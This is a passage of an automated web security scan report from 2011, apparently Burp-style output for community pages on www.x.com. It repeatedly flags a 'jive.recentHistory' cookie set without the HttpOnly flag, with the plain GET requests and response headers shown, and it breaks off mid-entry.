Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.9. https://www.x.com/community/ppx/authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.10. https://www.x.com/community/ppx/businesspayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.11. https://www.x.com/community/ppx/button_manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.12. https://www.x.com/community/ppx/code_samples  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.13. https://www.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.15. https://www.x.com/community/ppx/devchallenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.16. https://www.x.com/community/ppx/devchallenge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.17. https://www.x.com/community/ppx/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.18. https://www.x.com/community/ppx/devtalk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.19. https://www.x.com/community/ppx/devzone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.20. https://www.x.com/community/ppx/documentation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.21. https://www.x.com/community/ppx/ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.22. https://www.x.com/community/ppx/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.23. https://www.x.com/community/ppx/fundraising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.24. https://www.x.com/community/ppx/global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.25. https://www.x.com/community/ppx/global/au  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.26. https://www.x.com/community/ppx/global/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.27. https://www.x.com/community/ppx/global/cn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
